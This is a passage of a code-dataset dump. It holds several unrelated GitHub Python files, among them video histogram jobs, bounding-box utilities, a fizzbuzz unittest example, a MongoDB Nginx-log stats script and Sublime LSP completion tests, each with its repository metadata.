__get_stat_buzzer(mod):\n\t_stat = {}\n\t_stat['item'] = mod\n\t_stat['value'] = 'good'\n\tret,msg = commands.getstatusoutput('buzzer-ctl -g')\n\tif ret == 0:\n\t\tif 'on' in msg:\n\t\t\t_stat['value'] = '蜂鸣器告警'\n\t\telif 'force off' in msg:\n\t\t\t_stat['value'] = '蜂鸣器告警, 声音已关闭'\n\telse:\n\t\t_stat['value'] = '蜂鸣器状态获取失败'\n\treturn _stat\n\n_stat_list = {'disk': __get_stat_disk,\n\t\t'vg': __get_stat_vg,\n\t\t'power': __get_stat_power,\n\t\t'fan': __get_stat_fan,\n\t\t'buzzer': __get_stat_buzzer}\n\ndef get_stat_item():\n\treturn str(_stat_list.keys())\n\ndef get_sys_stat(item=None):\n\tglobal _stat_list\n\t_stat_rows = []\n\ttry:\n\t\tfor mod,func in _stat_list.items():\n\t\t\tif not item:\n\t\t\t\t_stat_rows.append(func(mod))\n\t\t\telif item == mod:\n\t\t\t\t_stat_rows.append(func(mod))\n\t\t\t\tbreak\n\texcept:\n\t\tpass\n\treturn _stat_rows\n\nif __name__ == '__main__':\n\tsys.exit(0)\n","repo_name":"github188/apps","sub_path":"sys-conf/libsysinfo.py","file_name":"libsysinfo.py","file_ext":"py","file_size_in_byte":9570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41584818272","text":"\"\"\"\nHistogram Computation\n=====================\n\nThis module provides a Job for the computation of the several histograms in\norder to detect different changes in the scene (lightning, speaker motion, etc).\n\nIt also provides a Job for gathering all user input (slide location, speaker location).\n\n.. autosummary::\n\n HistogramsLABDiff\n NumberOfVerticalStripesForSpeaker\n GenerateHistogramAreas\n\n\"\"\"\n\nfrom ..job import Job\nimport cv2\nimport numpy as np\nimport functools\n\nfrom ....util.tools import get_polygon_outer_bounding_box, crop_image_from_normalized_coordinates, \\\n sort_dictionary_by_integer_key\nfrom ....util.functor import Functor\nfrom .select_polygon import SelectPolygonJob, SelectSlide, SelectSpeaker\n\n\nclass HistogramsLABDiff(Job):\n \"\"\"\n Computes the histograms on the difference image of two consecutive frames.\n\n The difference image\n is expressed in the LAB color space using an Euclidean metric. The histograms are computed on\n several areas of the image plane.\n\n .. rubric:: Workflow inputs\n\n The inputs of the parents are:\n\n * A list of tuples `(name, rectangle)` specifying the locations where the histogram should\n be computed.\n\n * `name` is indicating the name of the rectangle.\n * `rectangle` is given as `(x,y, width, height)`, in **normalized coordinates**\n\n If several rectangles exist for the same name, those are merged (useful if the area\n is defined by several disconnected polygons). See :py:class:`GenerateHistogramAreas` for a possible\n input\n\n * A list of images specified by filename, on which the histograms will be computed\n\n .. rubric:: Workflow outputs\n\n The output of this Job is binary a function::\n\n frame_index, rectangle_name -> histogram\n\n that provides the histogram in the difference image in this particular rectangle.\n\n .. rubric:: Complexity\n\n Linear in the number of thumbnails. Reads each thumbnail image once.\n \"\"\"\n\n #: Name of the job in the workflow\n name = 'histogram_imlabdiff'\n\n #: Cached outputs:\n #:\n #: * ``histograms_labdiff`` histogram of the difference image of two consecutive images in the video\n #: sequence (computed in LAB space)\n outputs_to_cache = ['histograms_labdiff']\n\n def __init__(self,\n *args,\n **kwargs):\n super(HistogramsLABDiff, self).__init__(*args, **kwargs)\n\n def load_state(self):\n \"\"\"\n Sort the histograms by ``frame_index`` in order to be able to compare states.\n\n This is necessary because the json module can load and store dictionaries\n out of order.\n \"\"\"\n state = super(HistogramsLABDiff, self).load_state()\n\n if state is None:\n return None\n\n histograms_labdiff = state['histograms_labdiff']\n\n for area in histograms_labdiff.keys():\n histograms_labdiff[area] = sort_dictionary_by_integer_key(histograms_labdiff[area])\n\n state['histograms_labdiff'] = histograms_labdiff\n return state\n\n def run(self, *args, **kwargs):\n assert(len(args) >= 2)\n\n self.rectangle_locations = args[0]\n\n image_list = args[1]\n\n # init\n self.histograms_labdiff = {}\n\n rectangle_names = zip(*self.rectangle_locations)[0]\n unique_rectangle_names = list(set(rectangle_names))\n\n for name in unique_rectangle_names:\n element = self.histograms_labdiff.get(name, {})\n self.histograms_labdiff[name] = element\n\n # perform the computation\n im_index_tm1 = cv2.imread(image_list[0])\n imlab_index_tm1 = cv2.cvtColor(im_index_tm1, cv2.COLOR_BGR2LAB)\n\n for index, filename in enumerate(image_list[1:], 1):\n im_index_t = cv2.imread(filename)\n imlab_index_t = cv2.cvtColor(im_index_t, cv2.COLOR_BGR2LAB)\n\n # color diff\n im_diff = (imlab_index_t - imlab_index_tm1) ** 2\n im_diff_lab = np.sqrt(np.sum(im_diff, axis=2))\n\n # Compute histogram for every area\n for name, rect in self.rectangle_locations:\n cropped = crop_image_from_normalized_coordinates(im_diff_lab, rect)\n histogram = cv2.calcHist([cropped.astype(np.uint8)], [0], None, [256], [0, 256])\n\n # Merge histograms if necessary\n histogram_to_merge = self.histograms_labdiff[name].get(index, None)\n if histogram_to_merge is not None:\n histogram += histogram_to_merge\n\n self.histograms_labdiff[name][index] = histogram\n\n # @note(Stephan):\n # The histograms are stored as a python list in order to serialize them via JSON.\n for name in unique_rectangle_names:\n histogram_np_array = self.histograms_labdiff[name][index]\n self.histograms_labdiff[name][index] = histogram_np_array.tolist()\n\n def get_outputs(self):\n super(HistogramsLABDiff, self).get_outputs()\n if self.histograms_labdiff is None:\n raise RuntimeError('The points have not been selected yet')\n\n return Functor(self.histograms_labdiff, transform=functools.partial(np.array, dtype=np.float32))\n\n\nclass NumberOfVerticalStripesForSpeaker(Job):\n \"\"\"Indicates the number of vertical stripes used for speaker tracking.\n\n .. rubric:: Runtime parameters\n\n * ``nb_vertical_stripes`` the number of vertical stripes for the speaker tracking.\n\n \"\"\"\n\n #: name of the job in the workflow\n name = 'number_of_vertical_stripes_speaker'\n\n #: Cached outputs:\n #:\n #: * ``nb_vertical_stripes`` number of vertical divisions of the image for speacker tracking\n outputs_to_cache = ['nb_vertical_stripes']\n\n def __init__(self, *args, **kwargs):\n super(NumberOfVerticalStripesForSpeaker, self).__init__(*args, **kwargs)\n assert('nb_vertical_stripes' in kwargs)\n\n def run(self, *args, **kwargs):\n pass\n\n def get_outputs(self):\n super(NumberOfVerticalStripesForSpeaker, self).get_outputs()\n\n return self.nb_vertical_stripes\n\n\nclass GenerateHistogramAreas(Job):\n \"\"\"Generates the area of interest on which histograms should be computed by the downstream.\n\n .. rubric:: Workflow outputs\n\n Each area is identified by a name and a rectangle location.\n The output of this job is a list of tuples `(name, rect)` where each tuples\n contains:\n\n * The name of the area\n * A normalized rectangle `[x,y,width,height]` that specifies the area.\n \"\"\"\n\n #: name of the job in the workflow\n name = 'gather_selections'\n\n parents = [SelectSlide, SelectSpeaker, NumberOfVerticalStripesForSpeaker]\n\n #: Cached outputs:\n #:\n #: * ``rectangle_locations`` name and location of the areas on which the histograms should be computed\n outputs_to_cache = ['rectangle_locations']\n\n def run(self, *args, **kwargs):\n self.rectangle_locations = []\n\n # slide location gives the position where to look for the illumination\n # changes detection\n slide_loc = args[0]\n slide_rec = get_polygon_outer_bounding_box(slide_loc)\n x, y, width, height = slide_rec\n\n # those two areas are the left and right side of the slide area\n first_light_change_area = [0, y, x, height]\n second_light_change_area = [x + width, y, 1 - (x + width), height]\n\n # Unicode names in order to compare to the json file\n self.rectangle_locations += [u'slides', first_light_change_area], \\\n [u'slides', second_light_change_area]\n\n # speaker location is divided into vertical stripes on the full horizontal\n # extent\n speaker_loc = args[1]\n speaker_rec = get_polygon_outer_bounding_box(speaker_loc)\n _, y, _, height = speaker_rec\n nb_vertical_stripes = args[2]\n\n width_stripes = 1.0 / nb_vertical_stripes\n for i in range(nb_vertical_stripes - 1):\n x_start = width_stripes * i\n rect_stripe = [x_start, y, width_stripes, height]\n self.rectangle_locations += [u'speaker_%.2d' % i,\n rect_stripe],\n\n # final stripe adjusted a bit to avoid getting out the image plane\n rect_stripe = [1 - width_stripes, y, width_stripes, height]\n self.rectangle_locations += [u'speaker_%.2d' % (nb_vertical_stripes - 1),\n rect_stripe],\n\n def get_outputs(self):\n super(GenerateHistogramAreas, self).get_outputs()\n\n if self.rectangle_locations is None:\n raise RuntimeError('The Areas we want to compute the histograms on have not been computed yet.')\n\n return self.rectangle_locations\n","repo_name":"raffienficiaud/livius","sub_path":"livius/video/processing/jobs/histogram_computation.py","file_name":"histogram_computation.py","file_ext":"py","file_size_in_byte":8750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72363053208","text":"'''\nCreated on July 22, 2013\n\n@author: Eugene Shim\n\n This unittest suite is an example of a unittest file to be passed into GameandGrade through \n the admin interface to be automatically run when students upload files. No test fixture has\n to be provided. Given that the filename follows the correct convention by begining with the\n word \"test\", it will be detected and be run on the specified module.\n\n Further reading/examples are provided by Python can be found in the following link as of July\n 22, 2013. http://docs.python.org/2/library/unittest.html\n \n'''\n\n# This is the module chosen to be tested. When creating each task, instructors must specify a \n# filename that their students' uploads will copy to help ensure that unittests are run \n# correctly.\nimport fizzbuzz_correct\n\nimport unittest # This is a required import for unittesting\nimport sys, inspect #This is a required import for isfunction() and getmodule()\n\nclass fizzbuzzTestSuite(unittest.TestCase):\n \"\"\"A suite of unittest cases\"\"\"\n \n def is_mod_function(mod, func):\n \"\"\" \n Helper function that tests that the function 'func' is a function and that the \n functions are from that module \"mod\"\n \"\"\"\n \n return inspect.isfunction(func) and inspect.getmodule(func) == mod\n \n knownIfFizzBuzz = ( (3, \"Fizz!\"),\n (5, \"Buzz!\"),\n (10, \"Buzz!\"),\n (15, \"FizzBuzz!\") ) \n \n \n def test_search_function(self):\n \"\"\"\n Searches the module named \"prime\" for the function named \"IsPrime\".\n The term 'test' is NECESSARY for detection as a unittest case.\n Notice that this docstring also serves as the message/label for the\n unit test check on the web-application.\n \"\"\"\n \n isThereCheck = False\n \n for function in fizzbuzz_correct.__dict__.itervalues(): \n # Check each function in the module fizzbuzz for one named \"fizzbuzz\"\n if is_mod_function(fizzbuzz_correct, function) and function.__name__ == \"fuzzbuzz\":\n isThereCheck = True\n \n self.assertEquals(isThereCheck, True, \"The function isn't correctly defined.\")\n # If isThereCheck is not equal to True, then print the message\n \n \n def test_function_output(self):\n \"\"\"\n Thisfunction should return correct output. This test spot-checks \n fizzbuzz() for the the values given in knownIfPrime.\n \"\"\"\n \n for integer, stringValue in self.knownIfPrime: # Check each tuple in knownIfPrime\n result = fizzbuzz_correct.fizzbuzz(integer)\n \n self.assertEquals(stringValue, result, \"This doesn't seem to work with %d\" % (integer))\n \n \n def test_function_edge_case(self):\n \"\"\"\n This function checks whether fizzbuzz() will return the correct\n value for a specific value.\n \"\"\"\n \n result = fizzbuzz_correct.fizzbuzz(15)\n \n self.assertEquals(\"FizzBuzz!\", result, \"This doesn't seem to work with %d\" % (integer))\n \n \n \n \n \n ","repo_name":"eshim/game-grade","sub_path":"gameandgrade/media/test_files/test_fizzbuzz.py","file_name":"test_fizzbuzz.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35793331580","text":"import urllib\nimport codecs\n\nprefix = 'http://visualrecipes.com/'\n\nif __name__ == '__main__':\n\tf_imgs = open('data/all_imgs', 'r')\n\n\tfor img in f_imgs.readlines():\n\t\timg = img.rstrip('\\n')\n\t\timg = img.strip()\n\t\turllib.urlretrieve(prefix+img, './data/'+img)\n","repo_name":"gthandavam/Recipes","sub_path":"VR/download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34407481323","text":"import numpy as np\nimport cv2\n\n\ndef clip_boxes(boxes, im_shape):\n \"\"\"\n Clip boxes to image boundaries\n :param boxes: list of boxes\n :param im_shape: image shape\n :return: list of clipped boxes\n \"\"\"\n boxes = np.asarray(boxes)\n if boxes.shape[0] == 0:\n return boxes\n boxes = np.copy(boxes)\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)\n return boxes\n\n\ndef clip_box(bbox, im_shape):\n \"\"\"\n Clip single bounding box\n :param bbox: bounding box\n :param im_shape: Target shape of boundary box\n :return: Clipped boundary box\n \"\"\"\n h, w = im_shape[:2]\n bbox = np.copy(bbox)\n bbox[0] = max(min(bbox[0], w - 1), 0)\n bbox[1] = max(min(bbox[1], h - 1), 0)\n bbox[2] = max(min(bbox[2], w - 1), 0)\n bbox[3] = max(min(bbox[3], h - 1), 0)\n\n return bbox\n\n\ndef int_box(box):\n \"\"\"\n Round box pixel values to integer\n :param box: Bounding Box\n :return: Box with rounded values\n \"\"\"\n box = np.asarray(box, dtype=np.float)\n box = np.round(box)\n return np.asarray(box, dtype=np.int)\n\n\n# for display\n############################\ndef _to_color(indx, base):\n \"\"\"\n Converts an index to a color\n :param indx: Color index\n :param base: Base color\n :return: (b, r, g) tuple\n \"\"\"\n base2 = base * base\n b = 2 - indx / base2\n r = 2 - (indx % base2) / base\n g = 2 - (indx % base2) % base\n return b * 127, r * 127, g * 127\n\n\ndef get_color(indx, cls_num=1):\n \"\"\"\n Assigns color to a bounding box\n :param indx: Bounding box index number\n :param cls_num: Minimum index number for assignement\n :return: (b,r,g) color of the bounding box\n \"\"\"\n if indx >= cls_num:\n return (23 * indx % 255, 47 * indx % 255, 137 * indx % 255)\n base = int(np.ceil(pow(cls_num, 1. / 3)))\n return _to_color(indx, base)\n\n\ndef draw_detection(im, bboxes, scores=None, cls_inds=None, cls_name=None):\n \"\"\"\n Draw detection boxes in image\n :param im: Input picture\n :param bboxes: List of bounding\n :param scores: Scores of detection\n :param cls_inds: List of detected boxes indexes\n :param cls_name: List of detected boxes names\n :return: img in cv format with bounding boxes\n \"\"\"\n # draw image\n bboxes = np.round(bboxes).astype(np.int)\n if cls_inds is not None:\n cls_inds = cls_inds.astype(np.int)\n cls_num = len(cls_name) if cls_name is not None else 2\n\n imgcv = np.copy(im)\n h, w, _ = imgcv.shape\n for i, box in enumerate(bboxes):\n cls_indx = cls_inds[i] if cls_inds is not None else 1\n color = get_color(cls_indx, cls_num)\n\n thick = int((h + w) / 600)\n cv2.rectangle(imgcv,\n (box[0], box[1]), (box[2], box[3]),\n color, thick)\n\n if cls_indx is not None:\n score = scores[i] if scores is not None else 1\n name = cls_name[cls_indx] if cls_name is not None else str(cls_indx)\n mess = '%s: %.3f' % (name, score) if cls_inds is not None else '%.3f' % (score, )\n cv2.putText(imgcv, mess, (box[0], box[1] - 12),\n 0, 1e-3 * h, color, thick // 3)\n\n return imgcv\n","repo_name":"Holy225/DL-ComputerVision","sub_path":"Tracking/utils/bbox.py","file_name":"bbox.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14829992105","text":"\n\n\ndef interest_counter(balance, annual_interest_rate, min_month_payment_rate):\n month = 1\n monthly_interest_rate = annual_interest_rate/12\n total_payment = 0\n remaining_balance = balance \n for month in range(12):\n min_month_payment = remaining_balance *min_month_payment_rate\n total_payment += min_month_payment\n month += 1\n mothly_unpaid_balance = remaining_balance - min_month_payment\n remaining_balance = mothly_unpaid_balance * (1+monthly_interest_rate)\n r_mmp = round(min_month_payment, 2)\n r_tp = round(total_payment, 2)\n r_rb = round(remaining_balance, 2)\n print(\"Month: %s\" % month)\n print(\"Minimum monthly payment: %s\" % r_mmp)\n print(\"Remaining balance: %s\" % r_rb)\n \n \n print(\"Total paid: %s\" % r_tp)\n print(\"Remaining balance: %s\" % r_rb)\n \n\nprint(interest_counter(4213, 0.2, 0.04)) \n \n \n","repo_name":"Zahrou/EDX","sub_path":"ProblemSet2/credit_card4.py","file_name":"credit_card4.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26051999776","text":"'''\n# sql file translation code\nimport re\nfrom sys import argv\nfrom googletrans import Translator\nfrom tqdm import tqdm\n\ndef translate_sql(file_path):\n # Initialize the translator\n translator = Translator()\n\n # Open the SQL file\n with open(file_path, 'r', encoding='utf-8-sig') as f:\n sql_text = f.read()\n\n # find all the chinese text and translate\n matches = re.finditer(u'[\\u4e00-\\u9fff]+', sql_text)\n for match in tqdm(matches, desc='Translating', total=len(sql_text)):\n chinese_text = match.group()\n translated_text = translator.translate(chinese_text, dest='en').text\n translated_text = translated_text.replace(\"'\", \"\")\n sql_text = sql_text.replace(chinese_text, translated_text, 1)\n\n # Save the translated SQL file\n with open(file_path, 'w', encoding='utf-8-sig') as f:\n f.write(sql_text)\n\n# Usage\ntranslate_sql(argv[1])\n'''\n# made the above script much fast >>>>\nimport re\nfrom googletrans import Translator\nfrom sys import argv\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\ndef translate_text(chinese_text):\n translator = Translator()\n translated_text = translator.translate(chinese_text, dest='en').text\n return translated_text\n\ndef translate_sql(file_path):\n # Initialize the translator\n translator = Translator()\n\n # Open the SQL file\n with open(file_path, 'r') as f:\n sql_text = f.read()\n\n # find all the chinese text and translate\n matches = re.finditer(u'[\\u4e00-\\u9fff]+', sql_text)\n chinese_texts = [match.group() for match in matches]\n\n # Use multithreading to translate the texts in parallel\n with Pool(5) as p:\n translated_texts = list(tqdm(p.imap(translate_text, chinese_texts), desc='Translating', total=len(chinese_texts)))\n\n # Replace the chinese texts with the translated texts\n for i, chinese_text in enumerate(chinese_texts):\n sql_text = sql_text.replace(chinese_text, translated_texts[i], 1)\n\n # Save the translated SQL file\n with open(file_path, 'w') as f:\n f.write(sql_text)\n\n# Usage\ntranslate_sql(argv[1])\n","repo_name":"mrbeandev/code_translater","sub_path":"tran_sql.py","file_name":"tran_sql.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16259504008","text":"#!/usr/bin/env python3\n\"\"\"\nscript that provides some stats anbout Nginx logs stored in MongoDB\n\"\"\"\nfrom pymongo import MongoClient\n\n\ndef main(mongo_collection):\n \"\"\"read and format nginx logs\"\"\"\n print(f\"{mongo_collection.count_documents({})} logs\")\n methods = [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n method_stats = [collection.count_documents({'method': method}) for method in methods]\n print(\"Methods:\")\n for method, stat in zip(methods, method_stats):\n print(f\"\\tmethod {method}: {stat}\")\n status_logs = collection.count_documents({'method': 'GET', 'path': '/status'})\n print(f\"{status_logs} status check\")\n\n\nif __name__ == \"__main__\":\n client = MongoClient('mongodb://127.0.0.1:27017/')\n db = client['logs']\n collection = db['nginx']\n main(collection)\n","repo_name":"Gachenge/alx-backend-storage","sub_path":"0x01-NoSQL/12-log_stats.py","file_name":"12-log_stats.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40359423656","text":"import random\r\n\r\ncount = 1\r\nprint(\"Hello There! Welcome to the Guessing game\\n\"\r\n \"Please choose the number from 1-10 that I have in mind\")\r\n\r\ndef start_game(count):\r\n computer = random.randint(1,10)\r\n while True:\r\n try:\r\n answer = int(input(\"Please enter your guess\\n \"))\r\n if answer < 1 or answer > 10:\r\n count += 1\r\n print(\"please only input values from 1 to 10\\n\")\r\n continue\r\n if answer < computer:\r\n count += 1\r\n print(\"\\U0001F9D0 It's higher than that\\n \")\r\n continue\r\n elif answer > computer:\r\n count += 1\r\n print(\"\\U0001F9D0 It's Lower than that\\n\")\r\n continue\r\n print(\"\\U0001F44F Congrats!You got it in {} tries\".format(count))\r\n print(\"\\U0001F600 Thank You for playing this silly little game with us\")\r\n break\r\n\r\n except ValueError:\r\n count += 1\r\n print(\"Please input only Valid Input: Integers from 1-10\")\r\n\r\n\r\nif __name__ == '__main__':\r\n start_game(count)\r\n","repo_name":"Yog9/Python-Project-1","sub_path":"Guess_The_Number.py","file_name":"Guess_The_Number.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2479734233","text":"#!/usr/bin/env python3\nimport cv2\n\nscale = 2\n\ncam = cv2.VideoCapture(0)\n#cam.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)\n#cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)\nx = 640\ny = 480\n\nwhile True:\n\n ret_val, image = cam.read()\n # get the webcam size\n height, width, channels = image.shape\n #print(\"height is \",height)\n #print(\"width is\",width)\n # prepare the crop\n #centerX, centerY = int(height/2), int(width/2)\n #radiusX, radiusY = int(scale*height/100), int(scale*width/100)\n\n #minX, maxX = centerX-radiusX, centerX+radiusX\n #minY, maxY = centerY-radiusY, centerY+radiusY\n cv2.imshow(\"original\", image)\n minX = int(x/scale)\n maxX = int((x/scale)+(width-(width/scale)))\n minY = int(y/scale)\n maxY = int((y/scale)+(height-(height/scale)))\n #cropped = image[minY:maxY, minX:maxX]\n #resized_cropped = cv2.resize(cropped, (width, height))\n\n #cv2.imshow('Zoomed', resized_cropped)\n\n key = cv2.waitKey(1)\n\n # if q entered whole process will stop\n if key == ord('q'):\n break\n\n if key == ord('-'):\n if scale > 1.1:\n scale -= 0.1 # \n if key == ord('+'):\n if scale <10:\n scale += 0.1\n\n # add + or - 5 % to zoom\n\n #print(\"scale is \", scale)\n\ncv2.destroyAllWindows()\n","repo_name":"GaganDeepak/ScareCrow","sub_path":"zoomctrl.py","file_name":"zoomctrl.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8913565863","text":"import sublime\nfrom LSP.plugin.completion import CompletionHandler, CompletionState\nfrom unittesting import DeferrableTestCase\nfrom setup import (SUPPORTED_SYNTAX, text_config, add_config, remove_config,\n TextDocumentTestCase)\n\ntry:\n from typing import Dict, Optional, List\n assert Dict and Optional and List\nexcept ImportError:\n pass\n\nlabel_completions = [dict(label='asdf'), dict(label='efgh')]\ncompletion_with_additional_edits = [\n dict(label='asdf',\n additionalTextEdits=[{\n 'range': {\n 'start': {\n 'line': 0,\n 'character': 0\n },\n 'end': {\n 'line': 0,\n 'character': 0\n }\n },\n 'newText': 'import asdf;\\n'\n }])\n]\ninsert_text_completions = [dict(label='asdf', insertText='asdf()')]\nvar_completion_using_label = [dict(label='$what')]\nvar_prefix_added_in_insertText = [dict(label='$what', insertText='what')]\nvar_prefix_added_in_label = [\n dict(label='$what',\n textEdit={\n 'range': {\n 'start': {\n 'line': 0,\n 'character': 1\n },\n 'end': {\n 'line': 0,\n 'character': 1\n }\n },\n 'newText': 'what'\n })\n]\nspace_added_in_label = [dict(label=' const', insertText='const')]\n\ndash_missing_from_label = [\n dict(label='UniqueId',\n textEdit={\n 'range': {\n 'start': {\n 'character': 14,\n 'line': 26\n },\n 'end': {\n 'character': 15,\n 'line': 26\n }\n },\n 'newText': '-UniqueId'\n },\n insertText='-UniqueId')\n]\n\nedit_before_cursor = [\n dict(label='override def myFunction(): Unit',\n textEdit={\n 'newText': 'override def myFunction(): Unit = ${0:???}',\n 'range': {\n 'start': {\n 'line': 0,\n 'character': 2\n },\n 'end': {\n 'line': 0,\n 'character': 18\n }\n }\n })\n]\n\nedit_after_nonword = [\n dict(label='apply[A](xs: A*): List[A]',\n textEdit={\n 'newText': 'apply($0)',\n 'range': {\n 'start': {\n 'line': 0,\n 'character': 6\n },\n 'end': {\n 'line': 0,\n 'character': 6\n }\n }\n })\n]\n\n\nclass InitializationTests(DeferrableTestCase):\n def setUp(self):\n self.view = sublime.active_window().new_file()\n add_config(text_config)\n\n def test_is_not_applicable(self):\n self.assertFalse(CompletionHandler.is_applicable(dict()))\n\n def test_is_applicable(self):\n self.assertTrue(\n CompletionHandler.is_applicable(dict(syntax=SUPPORTED_SYNTAX)))\n\n def test_not_enabled(self):\n handler = CompletionHandler(self.view)\n self.assertFalse(handler.initialized)\n self.assertFalse(handler.enabled)\n result = handler.on_query_completions(\"\", [0])\n yield 100\n self.assertTrue(handler.initialized)\n self.assertFalse(handler.enabled)\n self.assertIsNone(result)\n\n def tearDown(self):\n remove_config(text_config)\n if self.view:\n self.view.set_scratch(True)\n self.view.window().focus_view(self.view)\n self.view.window().run_command(\"close_file\")\n\n\nclass QueryCompletionsTests(TextDocumentTestCase):\n def test_simple_label(self):\n yield 100\n self.client.responses['textDocument/completion'] = label_completions\n\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n # todo: want to test trigger chars instead?\n # self.view.run_command('insert', {\"characters\": '.'})\n result = handler.on_query_completions(\"\", [1])\n\n # synchronous response\n self.assertTrue(handler.initialized)\n self.assertTrue(handler.enabled)\n self.assertIsNotNone(result)\n items, mask = result\n self.assertEquals(len(items), 0)\n # self.assertEquals(mask, 0)\n\n # now wait for server response\n yield 100\n self.assertEquals(handler.state, CompletionState.IDLE)\n self.assertEquals(len(handler.completions), 2)\n\n # verify insertion works\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())), 'asdf')\n\n def test_simple_inserttext(self):\n yield 100\n self.client.responses[\n 'textDocument/completion'] = insert_text_completions\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n insert_text_completions[0][\"insertText\"])\n\n def test_var_prefix_using_label(self):\n yield 100\n self.view.run_command('append', {'characters': '$'})\n self.view.run_command('move_to', {'to': 'eol'})\n self.client.responses[\n 'textDocument/completion'] = var_completion_using_label\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())), '$what')\n\n def test_var_prefix_added_in_insertText(self):\n \"\"\"\n\n Powershell: label='true', insertText='$true' (see https://github.com/tomv564/LSP/issues/294)\n\n \"\"\"\n yield 100\n self.view.run_command('append', {'characters': '$'})\n self.view.run_command('move_to', {'to': 'eol'})\n self.client.responses[\n 'textDocument/completion'] = var_prefix_added_in_insertText\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())), '$what')\n\n def test_var_prefix_added_in_label(self):\n \"\"\"\n\n PHP language server: label='$someParam', textEdit='someParam' (https://github.com/tomv564/LSP/issues/368)\n\n \"\"\"\n yield 100\n self.view.run_command('append', {'characters': '$'})\n self.view.run_command('move_to', {'to': 'eol'})\n self.client.responses[\n 'textDocument/completion'] = var_prefix_added_in_label\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())), '$what')\n\n def test_space_added_in_label(self):\n \"\"\"\n\n Clangd: label=\" const\", insertText=\"const\" (https://github.com/tomv564/LSP/issues/368)\n\n \"\"\"\n yield 100\n self.client.responses['textDocument/completion'] = space_added_in_label\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())), 'const')\n\n def test_dash_missing_from_label(self):\n \"\"\"\n\n Powershell: label=\"UniqueId\", insertText=\"-UniqueId\" (https://github.com/tomv564/LSP/issues/572)\n\n \"\"\"\n yield 100\n self.view.run_command('append', {'characters': '-'})\n self.view.run_command('move_to', {'to': 'eol'})\n\n self.client.responses[\n 'textDocument/completion'] = dash_missing_from_label\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n self.view.run_command(\"insert_best_completion\")\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n '-UniqueId')\n\n def test_edit_before_cursor(self):\n \"\"\"\n\n Metals: label=\"override def myFunction(): Unit\"\n\n \"\"\"\n yield 100\n self.view.run_command('append', {'characters': ' def myF'})\n self.view.run_command('move_to', {'to': 'eol'})\n\n self.client.responses['textDocument/completion'] = edit_before_cursor\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"myF\", [7])\n yield 100\n # note: invoking on_text_command manually as sublime doesn't call it.\n handler.on_text_command('insert_best_completion', {})\n self.view.run_command(\"insert_best_completion\", {})\n yield 100\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n ' override def myFunction(): Unit = ???')\n\n def test_edit_after_nonword(self):\n \"\"\"\n\n Metals: List.| selects label instead of textedit\n See https://github.com/tomv564/LSP/issues/645\n\n \"\"\"\n yield 100\n self.view.run_command('append', {'characters': 'List.'})\n self.view.run_command('move_to', {'to': 